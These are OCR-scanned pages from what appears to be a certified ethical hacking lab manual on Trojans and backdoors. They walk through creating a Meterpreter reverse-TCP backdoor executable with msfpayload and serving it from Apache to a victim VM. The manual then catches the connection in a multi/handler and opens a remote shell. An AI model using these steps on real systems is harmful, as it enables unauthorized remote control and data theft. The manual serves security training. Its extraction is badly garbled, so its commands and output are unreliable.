sssei sssa&i
RA m ode options
Resi2 e windo-v to 4:3 JPG Quality 1 Delay in ms | '▼ 1000

^ ia ijo l

W W W V

Send mouseclicks Send pressed keys Send mousemoves Autollpdate pics Fullscreen

U

FIGURE 10.19: capturing victim machine

25. You can access tiles, modify die files, and so on in diis mode.
w

Rem10 te adm inistration m ode

*

r \ RA m ode o ptio ns
Resize window to 4 :3 1

*>

*? ■

1 !

Ij

JPG Quality 190% Delay in ms | 1000

▼j

W W
1 “

Send mouseclcks Send pressed Leys Send mausemoves Autollpdate pics Fullscrccp

^

______
:Tnt-.aocw

W

E1K«‫־‬

C fc ■ ‫־*־‬

J

&

Z

Z

-----------

Crcre:5FHB

► ** ■ ‫־‬o‫י־יי‬

I,i‫״־‬h

‫־‬

® 1• M 1

o;

FIGURE 10.20: capturing victim machine

26. Similarly, you can access die details o f die victim’s machine by clicking die respective functions.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posUire and exposure through public and free information.

C E H L ab M an u al P age 515

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

P L E AS E TALK TO YO U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility M osu ck er

In fo rm atio n C o llected /O b jectiv es A chieved O u tp u t: Record the screenshots o f the victim’s machine

Questions
1. Evaluate and examine various methods to connect to victims if they are 111 different cities or countries. □ Yes P latform S upported 0 C lassroom 0 iLabs 0 No

C E H L ab M an u al P age 516

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Hack Windows 7 Using Metasploit
Metasp/oit Frame// ork is a toolfor developing and executing exploit code against a remote target machine.
I CON KEY
Z^7 Valuable [ inform ation ______ .‫ * ׳י‬T est your knowledge _______ e W eb exercise *

Lab Scenario
Large companies are com mon targets for hackers and attackers o f various kinds and it is not uncom m on for these companies to be actively monitoring traffic to and from their critical IT mfrastnicture. Based 011 the functionality o f the Trojan we can safely surmise that the intent o f the Trojan is to open a backdoor 011 a compromised computer, allowing a remote attacker to monitor activity and steal inform ation from the compromised computer. Once installed inside a corporate network, the backdoor feamre o f the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest o f the infrastructure, meaning that the wealth o f liitormation that may be stolen could potentially be far greater than that existing 011 a single machine. A basic principle with all malicious programs is that they need user support to do the damage to a computer. That is the reason why Trojan horses try to deceive users by showing them some other form o f email. Backdoor programs are used to gam unauthorized access to systems and backdoor software is used by hackers to gain access to systems so that they can send 111 the malicious software to that particular system. Successful attacks by the hacker 01‫ ־‬attacker infecting the target environment with a customized Trojan horse (backdoor) determines exploitable holes 111 the current security system. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

Q W orkbook review £

& Tools dem onstrated in th is lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks. The objectives o f the lab include: ■ Creating a server and testing the network for attack

C E H L ab M an u al P age 517

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Attacking a network using sample backdoor and monitor the system activity

Lab Environment
To cany diis out, you need: ■
‫י‬ ■

A computer running Window Server 2012
BackTrack 5 r3 running in Virtual m achine W indows7 running 111 virtual machine (Victim machine)

■ ■

A web browser with Internet access Administrative privileges to mil tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m a licio u s or harmful code inside apparendy harmless programming or data 111 such a way that it can g e t control and cause damage, such as mining die hie allocation table on a hard drive.

Lab Tasks
sd
T A S K 1

1. Start B ackT rack 5 virUial machine. 2. O pen the terminal console by navigating to A pplication ^ B ackT rack
‫ ^־־‬E xploitation T ools ‫ ^־־‬N etw ork E xploitation T o o ls ‫ ^־־‬M etasp loit Fram ework ‫ ^־־‬m sfc o n so le
,y A pp lica tio ns P la c e s S y s te m | A c c e ss o r ie s ^ B ackltd ck ► : ‫ !*> ׳‬G athering ► ► . K N etw ork Exploitation Tbols ‫ ״‬/<§> » » ► ^ ‫־״‬ ► ^ Exp loitation Tools D a ta b a se Expl• ^ W ir ele ss Explo ^ S ocial E n gm ee ^ P h ysical E xplo ^ arm itage m sfd i m sfc o n s o le m sfu p d a te ‫ ! > ־׳‬. C isc o A ttack s ► .1 . FasM Vack i H M eta sp lo it Fram ework if - . SAP Exploitation ^ isr-evilgrade n e to ea r -teln e te n a b le ter m in e te r ► ► ► » d L IUC O ct 2 3 1 0 : 0 3 ‫ ״‬AM

Create Sever C onnection

, f Graphic* Internet i l l Office ^ Other

V ulnerability A s s e s s m e n t ► ■0 E xp loitation Ib o ls ►^ ► ► ► ^ ► a P n v ile g e E scalation M aintaining A cc ess R ev e rse E n gin een n g RFID T ools S tr e ss Testina

B\

! ^ ‫ ״‬Sound & V ideo

Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for diis tooL

f l f S y s te m Tools 5 W ine

r f - F ore n sics ^
jP

O p en Sou rce E 3b . start m sfpro

R eporting Tools S e r v ic e s M isce lla n eo u s * m _

V
‫—׳‬

?

‫ י‬, ‫כ‬

‫א‬

<<

back track

[C reate S im p le Exp loit...

C E H L ab M an u al P age 518

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council AH Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

FIGURE 11.1: Selecting msfconsole from metasploit Framework

3. Type the following command 111 msfconsole: m sfp ayload
w in d o w s/m eterp reter/rev erse tcp LH O ST=10.0.0.6 X > D esk to p /B a ck d o o r.ex e and press Enter N ote: This IP address (10.0.0.6) is BackTrack machines. These IP addresses may vary in your lab environment.
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection File Action Media Clipboard View 1 C j !S3 T U e0C t23. 3:32 PM Help

I I

« 3 ®S 0

II 1 ► fe

Applications Places system ‫ם‬

I File Edit V iew Terminal Help

3K0a SuperHack I I Logon

» [ m e t a s p lo it v 4 .s .0 - d e v [ c o r c : 4 b a p t: 1 . 0 ] - 927 ] = ‫ ״‬e x p l o i t s • 499 a u x i l i a r y - 151 p o s t - 2 5 1 ] = ‫ ־ ־‬p a y lo a d s • 28 e n c o d e r s - 8 nop s

xracK

y

; > j n s f p a y lo a d w i n d o w s /n e t e r p r e t e r /r e v e r s e t c p L H O S T -1O .0.0.6 X > D e sk to p /B a c k d o o r

FIGURE 11.2: CreatdngBackdoor.exe

M etasploit Framework, a tool for developing and executing exploit cod e against a rem ote target machine

4. Tins command will create a W indow s e x e c u ta b le file with name the B a ck d o o r.ex e and it will be saved on the BackTrack 5 desktop. ‫ד׳‬----------------------BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection J File Action Media Clipboard V !** Help

it 0 ® @g ■ !‫ ן‬it fe
^ Applications Places System U 1ue OCt 23. 11:53 AM

B a ckd oor.exe

A

<< back I track
,V i FIGURE 11.3: Created Backdoor.exe file

ja a j

5. N ow you need to share B a ck d o o r .e x e with your victim machine (Windows 7), by following these steps:
C E H L ab M a n u al P age 519 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

6.

O pen a new B ackT rack 5 terminal (CTRL+ALT+T) and then nan this command mkdir /var/w w w /sh are and press Enter to create a new director}‫ ״‬share.

To create new directory share following command is usedmkdir / var/www/ share

FIGURE 11.4: sharing the file

7.

Change the mode for the share folder to 755, by entering the command chm od -R 7 5 5 /var/w w w /share/ and then press Enter T=TB"■
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection File Action Media Clipboard View Help

<910 ( ■ ) @ O II It fe

,
d FT ■Rie Oct 2 3 .
12:03

A pp lications P la c es S y s te m □

Pf/

Backdoor.exe

.ft

• * > ‫׳י‬

‫ א‬ro o t^ b t: —

File Edit V iew Terminal Help

1 -.

ra < d 1 f A /» > * < /share

^ o o t$>i ‫ ־‬- k c h a o d

‫י‬I

•R 7S5 / v a r / * w w / s h a r e / |

m To change die mode of share folder use the following comma11d:chmod -R * /var/www/ share/

<< back I track £
‫״‬ai
FIGURE 11.5: sharing the file into 755

8.

Change the ownership o f that folder into www-data, by entering the command ch ow n -R w w w -d ata:w w w -d ata /var/w w w /share/ and then press Enter.

C E H L ab M an u al P age 520

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection Fil• Action M idi• Clipboard Mw Hilp

It > ® @0 II It > »
Applications Places system ( * ]

d I

R J Co c t2 3 .1 2 : 0 ‫ צ‬PM

'

v

k

ro o t^ b t: ‫־־‬

ile Edit V iew Terminal Help

‫׳‬ o t g f e t : ‫־‬ * nkdir /var/www/share
-2 i . l l L . ■ ‫ ■־‬T T ; i .

■ o t'jb t:-♦ cnown •R ^ > d a ra :v.w data /y a r/w //s ftr> rc / \

To ch a n g e ow nership of folder into w w w , u se this com m and chow n -R w w w data /var/www/share/

< <

back I track 5
FIGURE 11.6: Change the ownership of the folder

9. Type the command Is -la /var/w w w / | grep sh a re and then press Enter
BackTrack on W1N-D39MR5HL9E4 - Virtual M ach ine C onn ection File Action Media Clipboard View Help

'-!°‫*־׳‬

U

3 ® S >0

II I t ffe

Applications Places system (>‫ך‬

d [ > < :1 u eO Ct23.1

‫׳‬s

v

x r o o t^ b t n k d ir / v a r / w w / s h a r e
chaod -R 755 /v a r / w v w /s h a r e / chow r -R w » d a t a : w u w d a t a / y a r / w w / s t m r e / I s - I d /v a r A * * t / | g r e p s h a r e |

Tile Edit V iew Terminal Help ro o t^ b t:-* ro o tg b t:-# 'c -~ r o c t^ b t:-»

<< back I track 5
-0 3
FIGURE 11.7: sharing die Backdoor.exe file

10. The next step is to start the A p ach e ser v er by typing the se r v ic e a p a c h e 2 start command 111 the terminal, and then press Enter.

C E H L ab M an u al P age 521

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection Fil• Action M idi• CI1 pbo»rd V !** Htfp

It > ® @0

II 1 ►> »
a I 1UC CCt 23. 12:07 PM

Applications Places system (‫] י‬

‫י׳‬

‫׳י‬

‫ א‬r a o t^ b t: —

File Edit V iew TSfrminal Help

ro o tja b t:‫ ־‬# n k d ir /var/www/share ro o tja b t:-* ch«od -R 755 /v a r/w w /s h a re / r o o tg b t:'♦ chowr ■R v m data:www data /var/wwv/shar< ro o tg b t:-♦ I s - la /v a r /w w / | grep share d rw x r-x r-x 2 www-data w w -d a ta 4096 2012-10-23 12 ■ A -pet : c l : - ♦ s e rv ic e apache2 s t a r t | * S ta rtin g web server apache2 h ttp d (p id 3662) a lre a d y running

‫י‬
A

<<

back I track £
-0 3 .
FIGURE 11.8: Starting Apache W ebserver

& T o run the a p a ch e w eb server u se th e following command: cp /root/.m sf4/data/ex ploits /* /var/www/share/

11. N ow your Apache web server is running, copy the B a ck d o o r .e x e file into the share folder. Type the following command cp /root/D esk top /B ack d oor.exe /var/w w w /share/ and press Enter ‫ד« ח״ן־ן‬ « I©®©a 1 1! » ■r»
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection File Action Media Clipboard View Help , B a ckd oor.exe ‫־״־‬ v‫׳‬ x r o o t 'J b t : ~ R le Edit V iew Terminal Help

A

ro o ts to t:-# n k d ir /v a r/w w /s h a re root 0 b t : - 4 1 chaod -R 755 /v a r/w w /s h a r e / r o o t g b t : '• chown r m/m data:wvw data /v a r/w w v r/s h a r• /- .^ ro o tp b t:* # I s - la /w a r/m m / | grep share d r w x r - x r x 2 v/^v data ww#r data 4096 2612 JQ -2 1 n ! n 1 utm r o o t0 b t:* f s e rv ic e apache2 s ta r t • S ta rtin g web server apache2 h ttp d (p id 3662) a lre a d y running r o o tflb t:- * c p /r o o t / D e s k t o p /B a c k d o o r .e x e /v a r /w w w /s h a r e / L i J i : a i i : 111:1 l ..a, tiu - u l : . I i 11: ll 11111:1. ‫י‬ c p /r o o t/ O e v k t Q p / B d c k d o o f .e x e /v a r / w w w / s h a i e /

<< back I track
‫יו‬ 1 Status: Running

FIGURE 11.9: Running Apache Webserver

12. N ow go to W indow s 7 Virtual Machine, open Firetox or any web browser, and type the URL http://1 0 . 0 . 0 . 6/s h a r e / 111 the URL field and then press Enter
N ote: Here 10.0.0.6 is the IP address o f BackTrack; it may vary 111 your

lab environment.

C E H L ab M an u al P age 522

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

W in dow s 7 o n W1N-D39MR5HL9E4 - Virtual M a r in e C onnection Fil• Action Media Clipboard V !** Halp

‫י‬

‫ »׳‬0 )‫> (יי‬ !Q n 1 ► ; fe 0
Indtx of/th an ’

a h a 'c '1 0 .0 .0 .6
l£ 1 MottVniUd G«ttin9 $U 11*d i..i Su99«a«d SiUt W«t> SUaG^lcfy

C

*11‫ ־‬GopfJe

-

=' ‫־‬ ‫■׳‬te ‫׳‬° *
D B»knw I

Index o f/s h a re
N am e L a s t m od ifie d S u e D e scrip tio n

P aren t Directory

23-0ct-2012 12:12 72K
Apache/2.2.14 (U b tm ru ) Server at 1 0 0 .0 .6 P o rt SO

,W ^cw M 'W U Y ...

B a c k T r a tj^ ^ V I■ ^J

W ind ow ^ o^ fl,

FIGURE 11.10: Firefox web browser with Backdoor.exe

13. Download and save the B a ck d o o r .e x e tile in Windows 7 Virtual Machine, and save tins file on the desktop.
If you didn't have a p a ch e 2 installed, run aptg e t install a p a ch e 2

HZ ‫י‬
Action Media Clipboard View‫׳‬ Help

10 ®@0 II 1 ► ife5

Certified
•Unnujl*

CE H
Ethical Hacker

w
FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the B ackT rack m achine. 15. O pen the M etasp loit console. To create a handler to handle the connection Irom victim macliine (Windows 7), type the command u se exp loit/m ulti/handler and press Enter

C E H L ab M an u al P age 523

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection

m The exploit will be saved on / root/.msf4/data/exploits/ folder

Fil• It

Action > ®

M idi• @ 0

CI!pbo»rd II It

V !** >»

Htfp

Applications Placcs system

A

I

1U C OCt 23. 12:30 PM ,

‫י׳‬

v

x !te rm in a l

Bnckdoor.e f ' 1 * Edlt V1ew Terminal Help

! ( .‫־‬ •‫*״‬/
n sf > nsfpayload w1 ndows/‫ »׳‬e te rp re te r/reverse tc p LHOSW97T1m7b.91 X ^tofefetop/B ackdoor.exe [ * ] exec: nsfpayload w in d o w s /re te rp re te r/re v e rs e tc p LHOST-192. I$a-e0?9ix > C ^ g w ^ ^ j d o o r

Created by nsfpayload ( h ttp ://M M .n e ta s p lo lt.c o n ) . Payload: windows/mete rp re te r/re v e rs e tc p Length: 290 O ptions: ("LHOST192.168 . 8 . 91 ■<:=*‫־‬ "> wsf > use e x p lo it/n u lti/h a n d le r | n sf e x p lo it (h a n d le r) >

%

<< back I track ^
FIGURE 11.12: Exploit the victim machine

16. To use the reverse TCP, type the command s e t payload w in d ow s/m eterp reter/reverse_tcp and press Enter
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection File Action ® Media e e Clipboard 11 i t ‫ ן‬h View *> Help

•‫ןז« ׳״׳‬

< 0 10

Applications Places system

£j

[>y, 1ue OCt 23. 12:36 PM ,

B ackd o o r.J Fl|e Edit V iew Terminal Help

U=U To set reverse TCP vise the following command set payload windows/meterpreter/reverse - tcP

I

msf > tisfpayload w in d o w s/n e te rp re te r/re ve rse tc p LHOST192.168.8.91‫־‬ [*1 exec: nsfpayload w ln d o w s /re te rp re te r/re v e rs e tcp LH0ST=192.J68.8

!esktop/Backdoor.exe ^ *jp e s k top / Ba c kd 0 0 r

i l

C r e a te d b y n s f p a y lo a d ( h t t p : / / M M . n e t a s p l o i t . c o n ) .

Payload: w in dow s/m eterpreter/reverse tc p Length: 290 Opt io n s : { ‫־־‬LHOST"->" 192.168 8 .91‫> ״‬ BSl > use e x o lo lt/B u lT l/h a n d le r
nsf e x p l o i t ( h a n d l v r ) > l s e t p a y lo a d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l p ay I o n d - > w in d o w s /m e te r p m v r 7 T P V P r C T ‫־־‬r r p 1 flfcf e x p l o i t ( h a n d l e r ) >

f
:f/ ^

<< back I track 5
FIGURE 11.13: Setup die reverse TCP

17. To set the local IP address that will catch the reverse connection, type the command s e t Ihost 1 0 .0 .0 .6 (B ackT rack IP A d d ress) and press
E nter

C E H L ab M an u al P age 524

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack 0 ‫ ח‬W1N-D39MR5HL9C4 - Virtual M ach ine C onn ection Fil• • it Action 9 (•) © M id i* 0 Clipboard Ml * • d I HJC o c t 23. 12:40 PM V i** H*lp

Applications Placcs system ( * J

1/5 r IAv *T fc rro in a l
B n ck door.J ‫ «י'יז‬Edit View Terminal Help ! n i l > i s f p a y l o a d w in d 01 r f s / » e t e r p r e t e r / r e v e r s e _ t c p 1 H 0 S T -1 9 2 .1 6 8 .8 .9 1 X > D e s k t o p /B a c K d o o r .e x e I [ ♦ ] e x e c : m s f p a y lo a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p L H Q ST -192.1 6 8 . 8 . 9 1 X > D e s k t o p /B a c k d o o r .!

Created by rasfpayload ( h ttp ://w w x .n e ta s p lo it.c o n ) . . — P a y lo a d : w i n d o v s / m e t e r p r e t e r / r e v e r s e _ t c p L e n g t h : 298 o p t i o n s : {"LH 05T“= > " 1 9 2 . 1 6 8 .8 .9 1 * } m sf > u s e e x p l o . i t / 1 1 u l t i / h a n d l e r

""

msf e x p lo it ( handler) > se t payload w m dow s/neterpreter/reverse Tcp payload => windows/neTerp re T e r/re ye rse tco msf e x p lo it (handler) > |set Ih o s t 1 8 . 6 . 5 . 6 | IhosT => 1 0 . 6 . 0 . 6 e x p lo it ( handler) >__________________________________________________

<< back I track
58a.
FIGURE 11.14: set the lost local IP address

18. To start the handler, type the command ex p lo it -j - z and press Enter
BackTrack o n W1N-D39MR5HL9L4 - Virtual M ach ine C onn ection File Action Media Clipboard View Help

I I 1

« ) ® @<a 11 1> •

^ j
TUe OCt 2 3 .1 2:4 4 PM

Applications Places system [>^j

■ B ackd oor.d File Edit V iew Terminal Help

/4 t I ‫־‬ ‫<יו< “ י‬ '‫«׳!י״‬ ‫י‬

^

C r e a te d b y n s f p a y l o a d ( h t t p : / / w w . n e t a s p l o i t . c o n ) . P a y l o a d : w in d o w s /m e te rp r e t e r / r e v e r s e t c p L e n g t h : 290 O p tio n s : { ‫־‬ , IHOST■ ‘= > • '1 9 2 .1 6 8 .8 .9 1 ‫} ״‬ m sf > u s e e x p l o i t / n u l t i / h a n d l e r m sf e x p l o i t ( h a n d l e r ) > s e t p a y l o a d w i n d o w s / n e t e r p r e t p a y lo a d => w i n d o w s / r i e t e r p r e t e r / r e v e r s e t c p m sf e x p l o i t ( h a n d l e r ) > s e t I h o s t 1 8 . 6 . 8 . 6

Ih o st -> 1 0 .0 .0 .6

j

m sf e x p l o i t ( h a n d l e r ) > ! e x p l o i t - j - 1 1 I * ] E x p l o i t r u n n in g a s b a c k g r o u n d jo b [ - I S t a r t e d r e v e r s e h a n d le r on 1 8 .0 .8 .6 :4 4 4 4 I ‫״־‬I S t a r t i n g t h e p a y lo a d h a n d l e r . . . m sf e x p l o i t ( h a n d l e r ) > I

<< back I track 5
FIGURE 11.15: Exploit the windows 7 machine

19. N ow switch to the victim m a ch in e (Windows 7) and double-click the B a ck d o o r.ex e file to run it (which is already downloaded) 20. Again switch to the BackTrack machine and you can see the following figure.

C E H L ab M an u al P age 525

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection Filt Action M#di* CI1 pbo»rd II V i•* Htfp

!- , “ ‫י * י‬

•it

S (•) @ O

1► * »

Applications Places system
^ /
a

d

M : TUcoct23. 3:02 pm ,

v

x

‫!־‬term in al

File Edit V iew Terminal H elp

Back( ♦ " *‫ “־‬I 927 e x p l o i t s • 499 a u x i l i a r y • 151 p o s t « ■ 251 ]■ -- •‫ ־‬p a y lo a d s 28 e n c o d e rs 8 nops 1 s t > m sfpayload w in d o w s /iie te r p r e te r /r e v e r s e t c p LHOST-10.0.0 6 X > D esktop B ackdoor.exe [* ] ex ec : n sfp a y lo a d w in d o ir f s /m e te r p r e te r /r e v e r s e tc p LHOST=10.0.0.6 X > D esktop B ackdoor.exe sh : D esktop: i s a d ir e c to r y msf > m sfpayload w i n d o w s /n e te r p r e te r /r e v e r s e tc p LH0ST=18. 0 .0 . 6 X > D esk to p /B ack d o o r.ex e l ‫ ״‬J ex ec : n sfp a y lo a d w in d o irfs/m e te rp re te r/re v e rse tc p LHO^I‫ ־‬lft.ft.-O ^TX 0 ‫־*י‬e^1tt’6J»/Back d o o r.e x e C rea te d by m sfpayload <h t t p : / / * w . n e t a s p l o 1 t . c o 11 ) . P ayload: w in d o w s /n e te r p r e te r /r e v e r s e tc p L ength: 290 O p tio n s: {- LH0ST‫ *<= ״‬10. 0. 0. 6 ‫} ־‬ a k l > u se e x p l o it/m u lti/h a n d le r r s f e x p l o i t ( h a n c le r ) > s e t p ay lo ad w in d o w s /n e te r p r e te r /r e v e r s e tc p payload => w in d o w s /m e ie r p r e te r /r e v e r s e tc p aisf e x p l o i t ( h a n d le r) > s e t I h o s t 1 0 .0 .8 .6 I host => 10.0 .0 .6 l i l e x p lo it ( handler) > e x p lo it -J -£|

^

_

[*] ^loit 1^nnir^a^fca01^o‫״‬r)^|joW/T■

_____________

[ * ] ^ ^ r t ^ t a f e v e r se r a n d ie r of! 1 8 .0 .9 .6 :4 4 4 4 l 3 *‫ ־‬S t a r t i n g t h e p r fy to a d h s r d i e r ^ r r

Lf cl L is.

J iif xp plo loit( it (hhandler) ] S Sending (751121 b y te s ) to 1 0 .0 .0 .5 ■lis l e ex a n d le r ) > [ ‫״‬ •! ending StJBc s t ^ e (751128 !]‫ ־‬J I n t e r p r e t e r s e s s io n 1 opened ( 1 0 .C 6 .6 :4 4 4 4 -> 1 0 .0 .8 .5 :4 9 4 5 8 ) a t , 1 2012-18-23 !?‫־‬: 57152 ♦0530 |

l& T o interact with th e available se s s io n , you can u se s e s s io n s -i < sessio n id>

FIGURE 11.16: Exploit result of windows 7 machine

21. To interact with the available session, type the command s e s s io n s -i 1 and press E nter

FIGURE 11.17: creating the session

22. Enter the command sh ell, and press Enter.

C E H L ab M an u al P age 526

E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

BackTrack on WIN-D39M RSHL9E4 - Virtual M ach ine C onn ection Action 0 Media o Clipboard 11 1► d IX ‫׳‬ IUC OCt 23, 3:13 PM V ** Help

| File \ <n

(• ) ®

A pp lications P ia c cs s y s t e m ^ /
a n /

x

*!terminal

File Edit v ie w ifefm m al H elp

Backc Created by msfpayload ( h ttp ://w w w .n e ta s p lo 1 t.c o ■ >. Payload: w indow s/n e te rp re te r/re ve rse tcp Length: 290 O ptions: CLHOST*10. 0. 0. 6“ <■‫}"־‬ n k l > use e x p lo it/m u lti/h a n d le r msf e x p lo it ( handler) > set payload w in d o w s /n e te rp re te r/re v e rs e tc p payload *> w in d o w s /m e te rp re te r/re v e rs e tc p « 1 s f e x p lo it ( handler) > set !h o s t 16.6 .8 .6 I host 10.0 .0 .6 <‫־‬ B i l e x p lo it ( handler) > e x p lo it - j - 2 [*J E x p lo it running as background job. [*1 S ta rte d reverse handler on 10.0.6.6:4444 [ * j S ta rtin g the payload h a n d le r... I l i l e x p lo it ( handler) > [ * ] Sending stage (752128 bytes) to 10.0 .0 .5 [ * ] M eterpreter session 1 opened (10.6 .0 .6 :4 4 4 4 -> 10.0.0.5:49458) a t 2012-10n sf e x p lo it ( handler) > sessions * i 1 [ * ] S ta rtin g in te r a c tio n w ith 1 ...

c!«JS<1V1‫״‬I J Q L |\ M ic ro s o ft Windows T v e / s io if ^ n . 75©tj
Copyright (c ) 2009 M ic ro s o ft C orporation. c :\users\A iH nln\pesktop> | Al

LI Q L I V
r ig h ts reserved,

FIGURE 11.18: Type the shell command

23. Type the dir command and press Enter It shows all the directories present on the victim machine (Windows 7). 1- 1° ' r ’
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection File Action Media Clipboard View Help

<01 0 ®@ e 1 1 1 ► 1 fe 5
Applications Places system
/
a

cj

v‫׳‬

x

T e rm in a l

../ Backc

File Edit View Terminal Help » 1 s f e x p lo it ( handler) > sessions - i 1 [ - ] In v a lid session id n sf e x p lo it ( handler) > sessions ■ i 2 [ * ] s ta r tin g in te r a c tio n w ith 2 . . . in te r p r e te r > s h e ll Process 2540 created. Channel 1 crea ted. M ic ro s o ft windows [v e rs io n 6.1.76011 C opyright (c ) 2009 M ic ro s o ft C orporation. C: \Users\Adtnin\Desktop?b i f I d ir volume in d riv e c has no la b e l. Volume S e ria l Nunber i s 6868-71F6 O ire c to ry o f C:\U sers\Adnin\D esktop 10/23/2012 02:56 <0IR> | . I

A l l rig h ts reserved.

a

f t p s Ljsis
2

1 e /S ie 1^1w,c1 s g f te z 3 ‫־‬ ‫״‬ •w
O ir (s ) C:\Users\Adrn 1 n\Desktop>§

a

56.679,985.152 b y te s lfre e

FIGURE 11.19: check die directories of windows 7

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion 011 your target’s security‫ ״‬posture and exposure dirough public and free information.

C E H L ab M a n u al P age 527

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

‫ך‬ *

r .

1

P L E A S E TAL K T O Y O U R I N S T R U C T O R IF Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility M etasploit

In fo rm atio n C o llected /O b jectiv es A chieved O u tp u t: Hack the Windows 7 machine directories

In te rn e t C o n n ectio n R eq u ired □ Yes P latform S upported 0 C lassroom 0 iLabs 0 No

C E H L ab M an u al P age 528

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council A l Rights Reserved. Reproduction is Strictly Prohibited.